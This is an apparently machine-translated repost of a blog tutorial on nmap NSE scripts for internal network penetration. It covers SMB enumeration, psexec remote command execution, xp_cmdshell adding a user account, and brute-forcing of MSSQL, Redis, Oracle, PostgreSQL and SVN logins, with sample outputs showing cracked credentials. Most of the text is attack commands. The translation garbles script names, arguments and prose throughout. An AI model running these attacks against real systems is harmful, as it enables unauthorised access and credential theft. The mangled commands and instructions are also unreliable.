ネットワークの浸透を含め、nmapの負荷NSEスクリプトを使用 - 次の

SMB-ls.nse列举共享目录内的文件、配合SMB-列挙シェア使用
nmapの-p 445 <IP> --script SMB-LS --script-引数のシェア= C $、パス= \ TEMP "
nmapの- P 445 <IP> --script SMB-列挙-株式、SMB-LS
スクリプト出力 

ホストスクリプトの結果:
| SMB-LS:
| C言語の$ \ \ 192.168.56.101 \\ボリューム
| サイズ再生時間FILENAME
| 0 2007年12月2日午後12時20分09秒AUTOEXEC.BAT
| 0 2007年12月2日午後12時20分09秒CONFIG.SYS
| <DIR> 2007年12月2日〇時53分39秒のDocuments and Settings
| <DIR> 2009-09-08 13時26分10秒e5a6b742d36facb19c5192852c43
| <DIR> 2008-12-01午前2時06分29秒のinetpub
| 94720 2007年2月18日午前0時31分38秒のMsizap.exe
| <DIR> 2007年12月2日午後12時55分01秒プログラムファイル
| <DIR> 2008-12-01 2:05:
| <DIR> 2011年12月16日午前14時40分18秒USR
| <DIR>のコメント投稿2007年12月2日午後12時42分40秒WINDOWS
| <DIR>のコメント投稿2007年12月2日夜12時22分38秒WMPub
| _

もちろん、我々これらのパラメータは、と組み合わせ、次に行うことができる
地図-v -sV --min、ホストグループ50 --script = SMB-OS-発見--script = SMBv2の対応--script = SMB-列挙ドメインを--script = SMB-列挙-基-script = SMB-列挙-株--script = SMB-列挙-プロセス--script = SMB-列挙-セッション--script = SMB-列挙ユーザ-script = SMB-LS --script = SMB-セキュリティモード--script = SMB-サーバ統計--script = SMB-システム情報445 -OA XX 10.65.152.101 -p
この出力使い捨てSMBすべての関連情報、ファイルxxを保存します地元見るために私たちを助け

、私たちは、SMBのユーザーのパスワードを取得する際に、SMB-psexec.nseを、あなたはPsExecは-のSMB経由でリモートホストたちのコマンドを実行することができ
nmapの--script SMB-psexec.nse --script-argsを= smbuser = <ユーザー名>、smbpass = <パスワード > [、コンフィグ= <設定>] -p445 <ホスト>
須藤nmapの-sU -sS --script SMB-psexec.nse --script-引数= smbuser = <名>、smbpass = <パスワード>は、config = <設定>] -p U:137、T:139 <ホスト>
スクリプト出力 

ホストスクリプトの結果:
| SMB-PSEXEC:
| | Windows版
| | | _マイクロソフトWindows 2000の[バージョン5.00.2195]
| | 「IPCONFIG.EXE」からIPアドレスとMACアドレス
| | | イーサネットアダプタローカルエリア接続2:
| | | MACアドレス:00:50:56:A1:24:C2
| | | IPアドレス:10.0.0.30
| | | イーサネットアダプタローカルエリア接続:
| | | _ MACアドレス:00:50:56:A1:00:65
| | 「ネットユーザーからユーザーリスト
| | | 管理者TestUser3ユーザーレビュー
| | | IUSR_RON-WIN2K-TEST IWAM_RON-WIN2K-TESTのnmapの
| | | rontest123 SSHD SvcCOPSSH
| | | _ test1234テストTsInternetUser
| | 「ネットLOCALGROUP管理者」から「管理者ののメンバーシップ
| | | 管理者
| | | SvcCOPSSH
| | | test1234
| | | _テスト
| | ホストは、私たちのアドレスをpingすることはできますか?
| | | 32バイトのデータと10.0.0.138のping:
| | | _ 10.0.0.138からの返信:バイト= 32時間<10msのTTL = 64
| | スキャナに戻ってのtraceroute
| | | _ 1 <10ミリ<10ミリ<10ミリ秒10.0.0.138
| | arp.exeからのARPキャッシュ
| | | インターネットアドレス物理アドレスの種類
| | | _ 10.0.0.138 00-50-56-a1-27-4bダイナミック
| | リスニングと確立された接続(netstatの-an)の一覧
| | | プロトローカルアドレス外国住所都道府県
| | | TCP 0.0.0.0:22 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:4933 0.0.0.0:0 LISTENING
| | | TCP 10.0.0.30:139 0.0.0.0:0 LISTENING
| | | TCP 127.0.0.1:2528 127.0.0.1:2529がESTABLISHED
| | | TCP 127.0.0.1:2529 127.0.0.1:2528がESTABLISHED
| | | TCP 127.0.0.1:2531 127.0.0.1:2532 ESTABLISHED
| | | TCP 127.0.0.1:2532 127.0.0.1:2531がESTABLISHED
| | | TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
| | | TCP 127.0.0.1:5152 127.0.0.1:2530 CLOSE_WAIT
| | | UDP 0.0.0.0:135 *:*
| | | UDP 0.0.0.0:445 *:*
| | | UDP 0.0.0.0:1030 *:*
| | | UDP 0.0.0.0:3456 *:*
| | | UDP 10.0.0.30:137 *:*
| | | UDP 10.0.0.30:138 *:*
| | | UDP 10.0.0.30:500 *:*
| | | UDP 10.0.0.30:4500 *:*
| | | _ UDP 127.0.0.1:1026 *:*
| | 「netstatの-nr」から完全なルーティングテーブル
| | | ================================================== =========================
| | | インタフェースList
| | | 0x1の........................... MS TCPループバックインターフェイス
| | | 0x2の... 00 50 56 A1 00 65 ...... VMware社がAMD PCNETアダプタを加速
| | | 0x1000004 ... 00 50 56 A1 24 C2 ...... VMware社がAMD PCNETアダプタを加速
| | | ================================================== =========================
| | | ================================================== =========================
| | | アクティブルート:
| | | ネットワーク宛先ネットマスクゲートウェイインターフェイスメトリック
| | | 10.0.0.0 255.255.255.0 10.0.0.30 10.0.0.30 1
| | | 10.0.0.30 255.255.255.255 127.0.0.1 127.0.0.1 1
| | | 10.255.255.255 255.255.255.255 10.0.0.30 10.0.0.30 1
| | | 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
| | | 224.0.0.0 224.0.0.0 10.0.0.30 10.0.0.30 1
| | | 10.0.0.30 255.255.255.255 255.255.255.255 2 1
| | | =================== ================================================== ======
| | |永続的なルート:
| | |なし
| _ | _ | _表ルート

SMB-システムinfo.nseは、SMBプロトコルを介して、オペレーティングシステム情報、環境変数、ハードウェア情報、およびターゲットホストのブラウザを入手しますバージョン。
nmapの--script SMB-システムinfo.nse -p445 <ホスト>
sudoのnmapの-sU -sS --script SMB-システムinfo.nse -p U:137、T:139 <ホスト>
スクリプト出力 

ホストスクリプトの結果:
| SMB-システム情報:
| | OS詳細
| | | マイクロソフトはWindows 2000 Service Pack 4(ServerNT 5.0ビルド2195)
| | | 2008年10月10日5時47分19秒にインストール
| | | ロン(組織:マニトバ州政府)への登録
| | | パス:を%SystemRoot%\ system32;の%SystemRoot%;の%SystemRoot%\ System32 \ WBEM; C:\プログラムファイル\ Graphviz2.20 \ビン。
| | | SYSTEMROOT:C:\ WINNT
| | | _ページファイル:C:\ pagefile.sysに192 384(シャットダウン=> 0でクリア)
| | ハードウェア
| | | CPU 0:インテル(R)Xeonプロセッサ(TM)CPUの2.80GHz [2800mhz GenuineIntel]
| | | | _識別子0:x86のファミリー15モデル3 8ステッピング
SVGA IIのVMware:| | | _ビデオドライバ
| |ブラウザは
| | | Internet Explorerの6.0000
_ Firefoxの3.0.12(EN-US)| | _ | _


次のMS-SQL-brute.nseは時々 、特定のユーザーのパスワードを収集します亀裂内のMSSQLのマシンのために、あなたはすぐに多くのMSSQL管理者権限、その他の手段を通じて、ターゲットマシンの管理者権限へのアクセスを得ることができ、辞書にまとめることができます。
-p-MS 445 --scriptのnmapのSQLスクリプト---ブルート引数mssql.instance-すべて、userdbの= customuser.txt、custompass.txtのpassdb = <ホスト>
nmapの-p 1433 --script MS-SQL-ブルート- USERDB-引数= customuser.txt -script、パスワードデータベース= custompass.txt <ホスト>
スクリプトの出力 

| MS-SQL-ブルート:
| [192.168.100.128 TEST \]
|資格情報は見つかりませんでした
警告|:
| SA:AccountLockedOut
| [192.168。 100.128 \ PROD]
|た資格情報:
| webshop_reader:秘密は=>ログイン成功
| TESTUSER:secret1234 => PasswordMustChange
| _ lordvader:secret1234 =>ログイン成功

MSSQL-XP-cmdshell.nse名前が示す、我々はMSSQLのSA特権ユーザ名とパスワードを知っているとき、あなたはnmapのことで私たちのスクリプトを実行するコマンドを指定することができ、プロトコルまたはSMBのMSSQLによって行うことができる
-p-445の発見は、MSSQL、MSSQL-パスワード-空、cmdshell-XP-MSSQL <ホスト> --script nmapの
nmapの-p-MS 1433 --script SQLベースをcmdshell --script-argsを-XP mssql.username = SA、SA = mssql.password、MS-SQL-XP-cmdshell.cmd = "NETユーザーテストテスト/追加" <ホスト>
スクリプトの出力 

| MS-SQL-XP- cmdshell:
| [192.168.56.3 \ MSSQLSERVER]
|コマンド:/すべてのipconfig
|出力
| ======
|
| WindowsのIP設定
|
|ホスト名:EDUSRV011 ............
| プライマリDNSサフィックス。:cqure.net
| ノードタイプ。:不明
| IPルーティングが有効になります。:いいえ
| プロキシを有効WINS。:いいえ
| DNSサフィックス検索一覧。:cqure.net
|
| イーサネットアダプタローカルエリア接続3:
|
| 接続固有のDNSサフィックス。
| 説明。:AMD PCNETファミリPCIイーサネットアダプタ#2
| 物理アドレス。:08から00-DE-AD-C0-DE
| DHCPが有効。:はい
| 自動設定が有効になります。:はい
| IPアドレス。:192.168.56.3
|サブネットマスク:255.255.255.0 ...........
|デフォルトゲートウェイ:.........
| DHCPサーバー:192.168.56.2 ...........
| ..........リースが得られる:21の火星2010年午後12時12分10秒デン
|有効期限リース:21の火星2010年に1時12分10秒..........デン
| _


redis.nseをここではいくつかの時間前に書かれたSSHキーのRedisと組み合わせRedisのユーザーのパスワードを、ブラスト、あなたが著作権サーバーに取得することができ、言うことではありません。
-p 6379 nmapの<IP> RedisのBrute- --script
スクリプトの出力 

ポートサービスSTATE
6379 / TCPオープン不明
| RedisのBrute-:
|アカウント
|トレド-有効な資格情報!
|統計
| _ 5000を実行し、3秒の推測、TPS平均:1666。

オラクル-SID-brute.nse辞書のOracle SIDのマウントブラスト
=オラクル---スクリプト引数= oraclesids = /パス/に/ sidfile -p 1521年から1560年<ホスト>ブルートSID --script nmapの
nmapの--scriptをブルートオラクル-SID = -p 1521-1560 <ホスト>
スクリプトの出力 

SERVICE STATE PORT理由
1521 / TCP SYN-ACKオープンオラクル
|オラクル-SID-ブルート:
| ORCL
|のProd
| _ develの

pgSQLはのbrute.nseのPostgreSQLパスワードのユーザー私はpgsqlのパスワードブラストのためのスクリプトを推測し、適切な権限の下で、あなたがファイルを読み書き、許可を得るために制御サーバを促進するように、コマンドを実行することができます。
-p-5432 --script pgSQLのnmapのブルート<ホスト>
スクリプトの出力 

5432 / TCPオープンpgSQLの
| pgSQLのBrute-:
|ルート:!<空> =>有効な資格情報
!|:テスト=>有効な資格情報_テスト


ユーザーのOracle-列挙バイ使用可能なユーザーの神託を横断、辞書を搭載
nmapの--scriptオラクル-列挙-ユーザー--script-argsがOracleに列挙-users.sid = ORCL、userdbの= orausers.txt -p 1521年から1560年<ホスト>

何のuserdbが供給されていない場合、デフォルトのユーザリストが使用されている
スクリプト出力 

PORT STATEサービスREASON
1521 / tcpのオープンオラクルSYN-ACK
| オラクル-列挙-ユーザー:
| haxxorは、有効なユーザーアカウントであります
| noobのは、有効なユーザーアカウントで
| _パトリックが有効なユーザーアカウントである


オラクル的用户密码,,然后再进行其他操作爆破我们可以、オラクル・brute.nse知道のSIDの之后。
nmapの--scriptオラクル・ブルート-p 1521 -スクリプト引数のoracle-brute.sid = ORCL <ホスト>
スクリプトの出力 

PORT STATE SERVICE理由
1521 / tcpのオープンオラクルSYN-ACK
| オラクル・ブルート:
| アカウント
| システム:パウエル=>アカウントがロック
| Haxxor:!haxxor =>有効な資格情報
|統計
| _ 8秒で157の推測を施行し、平均TPS:19

SVNサーバのSVN-brute.nseの多くは、企業ネットワーク、これらのsvnサーバー上のコンテンツ内に存在する、我々はソースをダウンロードすることができますサーバーブラストをsvnをするためにいくつかの有用な情報、SVN-ブルートを見つけるためのコード。
svn nmapの-argsを--scriptブルート---スクリプト= SVN-brute.repo / SVN / -p 3690 <ホスト>
スクリプトの出力 

PORT理由SERVICE STATE
3690 / TCP SYN-ACKオープンのsvn
|けだもののsvn:
|アカウント
| _パトリック:=>ログイン秘密が修正

概要
-------
  X-svnのクラスでCRAM-MD5ので実行するために必要なコードが含まれ
    た認証
  でブルートに含まれていることにより、使用するドライバドライバの実装でX-クラス
    ライブラリを

これらは、実際の状況に応じて、使用中に、見る人の目は、賢明な知恵を見るときに、一般化することはできません、nmapのスクリプトの一部は、個人頻繁に使用される、内部ネットワークの普及率は、当然のことながら、スキャンが頻繁にIDやその他の安全装置をトリガしますです右のスクリプトを選択します。

おすすめ

転載: www.cnblogs.com/nul1/p/11225207.html